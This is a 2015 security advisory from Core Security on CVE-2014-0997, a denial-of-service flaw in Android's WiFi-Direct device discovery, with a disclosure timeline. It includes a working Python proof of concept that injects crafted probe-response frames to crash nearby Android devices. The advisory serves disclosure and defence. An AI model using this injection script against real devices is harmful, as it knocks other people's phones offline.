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Android WiFi-Direct - Denial of Service

Android WiFi-Direct - Denial of Service

Published on 2015-01-26

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Core Security - Corelabs Advisory

http://corelabs.coresecurity.com/



Android WiFi-Direct Denial of Service





1. *Advisory Information*



Title: Android WiFi-Direct Denial of Service

Advisory ID: CORE-2015-0002

Advisory URL:

http://www.coresecurity.com/advisories/android-wifi-direct-denial-service

Date published: 2015-01-26

Date of last update: 2015-01-26

Vendors contacted: Android Security Team

Release mode: User release





2. *Vulnerability Information*



Class: Uncaught Exception [CWE-248]

Impact: Denial of service

Remotely Exploitable: Yes

Locally Exploitable: No

CVE Name: CVE-2014-0997





3. *Vulnerability Description*



  Some Android devices are affected by a Denial of Service attack when

  scanning for WiFi Direct devices.



  An attacker could send a specially crafted 802.11 Probe Response frame

  causing the Dalvik subsystem to reboot because of an Unhandle Exception

  on WiFiMonitor class.





4. *Vulnerable Packages*



  . Nexus 5 - Android 4.4.4

  . Nexus 4 - Android 4.4.4

  . LG D806 - Android 4.2.2

  . Samsung SM-T310 - Android 4.2.2

  . Motorola RAZR HD - Android 4.1.2



  Other devices could be also affected.





5. *Non-vulnerable packages*



  . Android 5.0.1

  . Android 5.0.2





6. *Vendor Information, Solutions and Workarounds*



  Some mitigation actions may be to avoid using WiFi-Direct or update

to a non-vulnerable Android version.

  Contact vendor for further information.



7. *Credits*



  This vulnerability was discovered and researched by Andres Blanco

from the CoreLabs

  Team. The publication of this advisory was coordinated by the Core

Advisories

  Team.





8. *Technical Description / Proof of Concept Code*





  Android makes use of a modified *wpa_supplicant*[1]

  in order to provide an interface between the wireless driver and the

Android platform framework.



  Below the function that handles *wpa_supplicant* events. This function

  returns a jstring from calling NewStringUTF method.



/-----

   static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)

   {

       char buf[EVENT_BUF_SIZE];

       int nread = ::wifi_wait_for_event(buf, sizeof buf);

       if (nread > 0) {

           return env->NewStringUTF(buf);

       } else {

       return NULL;

       }

   }

-----/



  The WiFi-Direct specification defines the P2P discovery procedure to

enable P2P

  devices to exchange device information, the device name is part of

this information.



  The WifiP2pDevice class, located at

/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,

  represents a Wi-Fi p2p device. The constructor method receives the

string provided by

  the *wpa_supplicant* and throws an IllegalArgumentException in case

  the event is malformed.



  Below partial content of the WiFiP2PDevice.java file.



/-----

       [...]



       /** Detailed device string pattern with WFD info

        * Example:

        *  P2P-DEVICE-FOUND 00:18:6b:de:a3:6e

p2p_dev_addr=00:18:6b:de:a3:6e

        *  pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'

config_methods=0x188

        *  dev_capab=0x21 group_capab=0x9

        */

       private static final Pattern detailedDevicePattern =

Pattern.compile(

           "((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +

           "(\\d+ )?" +

           "p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +

           "pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +

           "name='(.*)' " +

           "config_methods=(0x[0-9a-fA-F]+) " +

           "dev_capab=(0x[0-9a-fA-F]+) " +

           "group_capab=(0x[0-9a-fA-F]+)" +

           "( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"

       );



       [...]



       /**

        * @param string formats supported include

        *  P2P-DEVICE-FOUND fa:7b:7a:42:02:13

p2p_dev_addr=fa:7b:7a:42:02:13

        *  pri_dev_type=1-0050F204-1 name='p2p-TEST1'

config_methods=0x188 dev_capab=0x27

        *  group_capab=0x0 wfd_dev_info=000006015d022a0032

        *

        *  P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13

        *

        *  AP-STA-CONNECTED 42:fc:89:a8:96:09

[p2p_dev_addr=02:90:4c:a0:92:54]

        *

        *  AP-STA-DISCONNECTED 42:fc:89:a8:96:09

[p2p_dev_addr=02:90:4c:a0:92:54]

        *

        *  fa:7b:7a:42:02:13

        *

        *  Note: The events formats can be looked up in the

wpa_supplicant code

        * @hide

        */

       public WifiP2pDevice(String string) throws

IllegalArgumentException {

           String[] tokens = string.split("[ \n]");

           Matcher match;



           if (tokens.length < 1) {

               throw new IllegalArgumentException("Malformed supplicant

event");

           }



           switch (tokens.length) {

               case 1:

                   /* Just a device address */

                   deviceAddress = string;

                   return;

               case 2:

                   match = twoTokenPattern.matcher(string);

                   if (!match.find()) {

                       throw new IllegalArgumentException("Malformed

supplicant event");

                   }

                   deviceAddress = match.group(2);

                   return;

               case 3:

                   match = threeTokenPattern.matcher(string);

                   if (!match.find()) {

                       throw new IllegalArgumentException("Malformed

supplicant event");

                   }

                   deviceAddress = match.group(1);

                   return;

               default:

                   match = detailedDevicePattern.matcher(string);

                   if (!match.find()) {

                       throw new IllegalArgumentException("Malformed

supplicant event");

                   }



                   deviceAddress = match.group(3);

                   primaryDeviceType = match.group(4);

                   deviceName = match.group(5);

                   wpsConfigMethodsSupported = parseHex(match.group(6));

                   deviceCapability = parseHex(match.group(7));

                   groupCapability = parseHex(match.group(8));

                   if (match.group(9) != null) {

                       String str = match.group(10);

                       wfdInfo = new

WifiP2pWfdInfo(parseHex(str.substring(0,4)),

                               parseHex(str.substring(4,8)),

                               parseHex(str.substring(8,12)));

                   }

                   break;

           }



           if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {

               status = AVAILABLE;

           }

       }



       [...]

-----/



  On some Android devices when processing a probe response frame with a

WiFi-Direct(P2P)

  information element that contains a device name attribute with

specific bytes generates

  a malformed supplicant event string that ends up throwing the

IllegalArgumentException.

  As this exception is not handled the Android system restarts.



  Below partial content of the logcat of a Samsung SM-T310 running

Android 4.2.2.



/-----

     I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00

p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5  'fa¬¬'

config_methods=0x188 dev_capab=0x21 group_capab=0x0

     E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:

WifiMonitor

     E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:

Malformed supplicant event

     E/AndroidRuntime( 2129):        at

android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)

     E/AndroidRuntime( 2129):        at

android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)

     E/AndroidRuntime( 2129):        at

android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)

     E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o

/data/log/dumpstate_sys_error

-----/





8.1. *Proof of Concept*





  This PoC was implemented using the open source library Lorcon

  [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.



/-----

   #!/usr/bin/env python



   import sys

   import time

   import struct

   import PyLorcon2





   def get_probe_response(source, destination, channel):

       frame = str()

       frame += "\x50\x00"  # Frame Control

       frame += "\x00\x00"  # Duration

       frame += destination

       frame += source

       frame += source

       frame += "\x00\x00"  # Sequence Control

       frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp

       frame += "\x64\x00"  # Beacon Interval

       frame += "\x30\x04"  # Capabilities Information



       # SSID IE

       frame += "\x00"

       frame += "\x07"

       frame += "DIRECT-"



       # Supported Rates

       frame += "\x01"

       frame += "\x08"

       frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"



       # DS Parameter Set

       frame += "\x03"

       frame += "\x01"

       frame += struct.pack("B", channel)



       # P2P

       frame += "\xDD"

       frame += "\x27"

       frame += "\x50\x6F\x9A"

       frame += "\x09"

       # P2P Capabilities

       frame += "\x02" # ID

       frame += "\x02\x00" # Length

       frame += "\x21\x00"

       # P2P Device Info

       frame += "\x0D" # ID

       frame += "\x1B\x00" # Length

       frame += source

       frame += "\x01\x88"

       frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"

       frame += "\x00"

       frame += "\x10\x11"

       frame += "\x00\x06"

       frame += "fafa\xFA\xFA"



       return frame





   def str_to_mac(address):

       return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))





   if __name__ == "__main__":

       if len(sys.argv) != 3:

           print "Usage:"

           print "  poc.py <iface> <target>"

           print "Example:"

           print "  poc.py wlan0 00:11:22:33:44:55"

           sys.exit(-1)



       iface = sys.argv[1]

       destination = str_to_mac(sys.argv[2])



       context = PyLorcon2.Context(iface)

       context.open_injmon()



       channel = 1

       source = str_to_mac("00:11:22:33:44:55")

       frame = get_probe_response(source, destination, channel)



       print "Injecting PoC."

       for i in range(100):

           context.send_bytes(frame)

           time.sleep(0.100)

-----/





9. *Report Timeline*



  . 2014-09-26:

       Core Security contacts Android security team to inform them that

a vulnerability has been found in Android. Core Security sends a draft

advisory with technical details and PoC files.

  . 2014-09-29:

       Android Security Team acknowledges reception of the advisory.

  . 2014-09-30:

       Core Security notifies that the tentative publication date is

set for Oct 20rd, 2014.

  . 2014-09-30:

       Android Security Team acknowledges.

  . 2014-10-16:

       Core Security requests a status update.

  . 2014-10-16:

       Android Security Team responds that they have classify the

vulnerability as low severity and don't currently have a timeline for

releasing a fix.

  . 2014-10-20:

       Core Security does not completely agrees with the vulnerability

classification and reschedule the publication of the advisory.

  . 2014-10-16:

       Android Security Team acknowledges and strengthens it's position

that they don't currently have a timeline for releasing a fix.

  . 2015-01-06:

       Core Security requests a status update.

  . 2015-01-12:

       Core Security asks for confirmation of reception of the previous

email.

  . 2015-01-16:

       Android Security Team acknowledges and respond that they don't

currently have a timeline for releasing a fix.

  . 2015-01-19:

       Core Security notifies that vendor cooperation is needed in

order to keep this process coordinated. If vendor refuses to provide the

requested information the advisory will be released tagged as 'user

release'. The advisory is re-scheduled for January 26th, 2015.

  . 2015-01-20:

       Android Security Team acknowledges and respond that they don't

currently have a timeline for releasing a fix.

  . 2015-01-26:

       The advisory CORE-2015-0002 is published.





10. *References*



[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/

[2] - Lorcon site. https://code.google.com/p/lorcon

[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2





11. *About CoreLabs*



  CoreLabs, the research center of Core Security, is charged with

anticipating

  the future needs and requirements for information security technologies.

  We conduct our research in several important areas of computer security

  including system vulnerabilities, cyber attack planning and simulation,

  source code auditing, and cryptography. Our results include problem

  formalization, identification of vulnerabilities, novel solutions and

  prototypes for new technologies. CoreLabs regularly publishes security

  advisories, technical papers, project information and shared software

  tools for public use at:

  http://corelabs.coresecurity.com.





12. *About Core Security Technologies*



   Core Security Technologies enables organizations to get ahead of threats

   with security test and measurement solutions that continuously identify

   and demonstrate real-world exposures to their most critical assets. Our

   customers can gain real visibility into their security standing, real

   validation of their security controls, and real metrics to more

   effectively secure their organizations.



   Core Security's software solutions build on over a decade of trusted

   research and leading-edge threat expertise from the company's Security

   Consulting Services, CoreLabs and Engineering groups. Core Security

   Technologies can be reached at +1 (617) 399-6980 or on the Web at:

   http://www.coresecurity.com.





13. *Disclaimer*



   The contents of this advisory are copyright

   (c) 2014 Core Security and (c) 2014 CoreLabs,

   and are licensed under a Creative Commons

   Attribution Non-Commercial Share-Alike 3.0 (United States) License:

   http://creativecommons.org/licenses/by-nc-sa/3.0/us/





14. *PGP/GPG Keys*



   This advisory has been signed with the GPG key of Core Security

   advisories team, which is available for download at



http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
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